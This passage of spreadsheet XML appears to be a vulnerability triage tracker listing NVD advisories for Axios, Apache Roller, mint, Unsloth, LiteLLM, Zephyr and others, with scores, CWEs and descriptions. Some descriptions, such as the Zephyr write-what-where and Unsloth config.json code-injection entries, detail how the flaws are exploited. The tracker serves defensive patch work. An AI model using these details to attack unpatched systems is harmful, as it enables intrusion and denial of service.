          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.13.0 until 1.20.0, Http2Sessions does not install adequate error handling for a ClientHttp2Session during Axios HTTP/2 session initialization or reuse. A request uses httpVersion: 2 and the ClientHttp2Session emits an error during session initialization or reuse. The unhandled session error escapes normal Promise rejection handling. The uncaught error can terminate the Node.js process and cause denial of service. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, express, gin</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.16.1 until 1.20.0, the RFC 2397 regular expression allows slash characters on both sides of the media-type separator. An application passes an attacker-controlled malformed data URL containing many slash characters and no comma. the JavaScript regular-expression engine explores many separator placements before rejecting the URL. Synchronous excessive backtracking can block the Node.js event loop and cause denial of service. The affected identifiers are fromDataURI, DATA_URL_PATTERN, data:. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, express</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.15.0 until 1.20.0, Axios shouldBypassProxy applies a quadratic trailing-dot regular expression to redirect hostnames. HTTP_PROXY or HTTPS_PROXY is configured, NO_PROXY or no_proxy is non-empty, redirects are followed, and a crafted redirect Location contains many dots followed by a non-dot character. Hostname.replace(/.+$/, '') backtracks quadratically while processing the crafted redirect hostname. Synchronous regular-expression processing can block the Node.js event loop and cause denial of service. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54160</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>github, rust</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Network UPS Tools is a collection of programs which provide a common interface for monitoring and administering UPS, PDU and SCD hardware. Prior to commits 658b24e and 1aa31d1, the GitHub Actions script used to prepare NUT tarballs and update GitHub Checks statuses and PR comments about it was mis-structured in terms of mixing code running with higher privileges (single-use token generated with write permissions) and untrusted inputs (PR source branch). A malicious PR run from a fork could extract the GITHUB_TOKEN value. It could potentially be abused while it was valid (while the GHA job ran) to manipulate Git repository contents, commit checks/statuses, or issue/PR comments, according to permissions it was issued with. This issue has been patched via commits 658b24e and 1aa31d1.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54160</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82383</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>Missing Authentication for Critical Function in Apache Roller 6.1.5 allows an unauthenticated remote attacker to persistently change a site-global configuration value (the frontpage weblog selection) on any installed instance, because the setup action remains anonymously reachable after installation and persists configuration without an authorization check. No optional feature or non-default configuration is required; the result can redirect or break the site's public frontpage, with administrative recovery available. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which restricts the write to global administrators.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82383</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91043</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>hp</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a malicious HTTP/2 server to exhaust memory on the client host and cause a denial of service.
Mint.HTTP2 enforces the client's max_header_list_size setting only on the compressed size of an inbound header block, while RFC 9113 section 6.5.2 defines the limit on the decoded header list. An HPACK indexed field costs one byte on the wire and decodes to a dynamic table entry of up to 4 KB, and join_cookie_headers/1 in lib/mint/http2.ex copies every cookie value of a response into one new binary. A header block under the default 256 KB wire limit therefore makes the client allocate about 1 GB for a single response, and several such responses in one delivery exhaust the memory of the process that owns the connection or of the whole VM.
This issue affects mint: from 1.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91043</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82323</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in Enocta Educational Technologies Inc. Enocta Platform allows Exploitation of Trusted Identifiers.
This issue affects Enocta Platform: through 2026-09-28.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82323</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82380</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) in Apache Roller 6.1.5 allows a remote attacker to cause a logged-in user to perform state-changing actions under the victim's authority, because the CSRF validation filters accept a request that does not submit the required salt token, validating instead against a value the server itself generated for the request. No optional feature or non-default configuration is required; any logged-in author or administrator is affected when induced to visit a crafted page. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which validates only the submitted salt and applies the same check to multipart forms.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82380</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88805</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>go, suse</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>Incorrect credential cleaning on logout could be used by remote attackers to keep access credentials even after the account was logged out. Affected is SUSE Rancher 2.15 before 2.15.2.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88805</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93348</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>Unsloth Zoo versions 2025.9.9 before 2026.8.14, as implemented in Unsloth 2025.9.9 through 2026.8.19, contains a code injection vulnerability in the model-loading compile path where the get_transformers_model_type() function in hf_utils.py collects model_type values from nested model configurations without enforcing a character allowlist, allowing newlines and arbitrary Python source to survive normalization. Attackers can embed a newline in a nested model_type value within a malicious model's config.json to terminate the generated import statement and execute arbitrary Python code via exec() in unsloth_compile_transformers(), achieving remote code execution as the loading user when the model is loaded for training or inference.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93348</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93355</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>LiteLLM contains a weak authentication vulnerability that allows an attacker holding a valid JWT from the configured identity provider to authenticate as any existing user by exploiting an email-based fallback lookup in the JWT authentication flow without verifying the email_verified claim. Attackers can present a token with an unverified email address matching a victim's account to inherit the victim's role, including proxy_admin privileges, and permanently overwrite the victim's stored identity binding to retain persistent unauthorized access to administrative endpoints exposing API keys and user management.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93355</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102004</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>Wind River VxWorks 7 prior to 26.09, specific system call arguments can result in memory corruption within the memory management subsystem. Fixed in Version 26.09</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102004</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16513</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>The userspace verifier z_vrfy_rtio_sqe_copy_in_get_handles() in subsys/rtio/rtio_syscalls.c (subsys/rtio/rtio_handlers.c before v4.3.0) validated the RTIO object handle and the sqes input array, but not the handle out-parameter. On the first loop iteration it executed *handle = sqe, storing the kernel address of the newly acquired submission-queue entry through a pointer taken verbatim from user mode, with no K_SYSCALL_MEMORY_WRITE check in front of it.
Any user-mode thread that has been granted a struct rtio kernel object can invoke the syscall with an arbitrary address in handle. That is the ordinary way an unprivileged thread uses the RTIO API, for example via sensor_read_async_mempool() or the async ADC helpers, which call rtio_sqe_copy_in_get_handles() internally. The store happens in supervisor mode before any submission-entry validation, so it fires regardless of whether the SQE contents are subsequently rejected. Only builds with CONFIG_USERSPACE and CONFIG_RTIO are affected; without CONFIG_USERSPACE the verifier is not compiled and the caller is already privileged.
The write address is fully attacker-chosen and the written value is a pointer into the caller's own RTIO ring, whose contents the caller controls (the following *sqe = sqes[i] copies an attacker-supplied struct rtio_sqe into that slot). This yields a write-what-where primitive placing a pointer to attacker-controlled data at any kernel address, sufficient to corrupt kernel function pointers, thread structures, or memory-domain partition tables, and thus to escalate from user mode to kernel mode, defeating the isolation boundary CONFIG_USERSPACE is meant to enforce. At minimum it is a reliable kernel memory-corruption and crash primitive. The reporter reproduced the write on qemu_x86: a K_USER thread changed a supervisor global from NULL to a live kernel SQE pointer.
The fix adds K_SYSCALL_MEMORY_WRITE(handle, sizeof(*handle)) (guarded by the existing optional-NULL semantics) before the loop, so the destination must lie in the calling thread's writable memory domain or the thread is terminated by K_OOPS. The neighbouring verifier z_vrfy_rtio_cqe_get_mempool_buffer(), which checked its buff/buff_len out-parameters only for read although the implementation writes through them, was hardened separately by bea93400138 ("rtio: syscalls: validate output params as writable"); that residual was materially weaker, since a read check still confines the target to the caller's own memory domain.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16513</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18413</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>The ADC API requires each driver to reject a sampling sequence whose destination buffer is too small: the buffer_size field of struct adc_sequence in include/zephyr/drivers/adc.h documents that "the driver must ensure that samples are not written beyond the limit and it must return an error if the buffer turns out to be not large enough". The NXP MCUX LPADC driver did not honour that contract. mcux_lpadc_start_read() in drivers/adc/adc_mcux_lpadc.c performed no buffer-size check at all before assigning data-&gt;buffer = sequence-&gt;buffer. Each completed conversion then stores one 16-bit sample per enabled channel per sampling round through an unbounded *data-&gt;buffer++: in mcux_lpadc_isr() for interrupt-driven builds, and in mcux_lpadc_dma_callback() for DMA-driven builds on releases that have the DMA path. A sequence selecting two channels with a two-byte buffer, for example, has its second sample written past the end of the buffer.
On a build with CONFIG_USERSPACE, adc_read() and adc_read_async() are system calls. The handler in drivers/adc/adc_handlers.c copies the sequence in from user memory, verifies only that [buffer, buffer + buffer_size) is writable by the calling thread, and rejects a user-supplied options-&gt;callback; it deliberately leaves the size arithmetic to the driver. A user-mode thread that has been granted access to an LPADC device object therefore fully controls channels, buffer, buffer_size and options-&gt;extra_samplings, and can request far more samples than its buffer can hold: up to channels * 65536 samples into a two-byte buffer, since the sample pointer is only rewound on a repeat sampling, never on the extra samplings of a sequence.
The resulting stores are performed by the driver in kernel mode (in the ADC interrupt handler or the DMA completion callback), where the MPU does not restrict the thread's memory domain, so the write walks linearly out of the user partition and into adjacent memory such as other partitions, kernel data or thread stacks. The impact is kernel-memory corruption of attacker-chosen length at an attacker-chosen offset, a plausible privilege-escalation and denial-of-service primitive from an unprivileged user-mode thread. Builds without CONFIG_USERSPACE are affected only as a caller-side robustness defect, since the application itself supplies the buffer.
The fix calls the new shared helper adc_sequence_validate_buffer() in drivers/adc/adc_common.c from mcux_lpadc_start_read(). The helper computes active_channels  sizeof(uint16_t)  (1 + extra_samplings) and returns -ENOMEM before any sampling is started.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18413</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18414</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
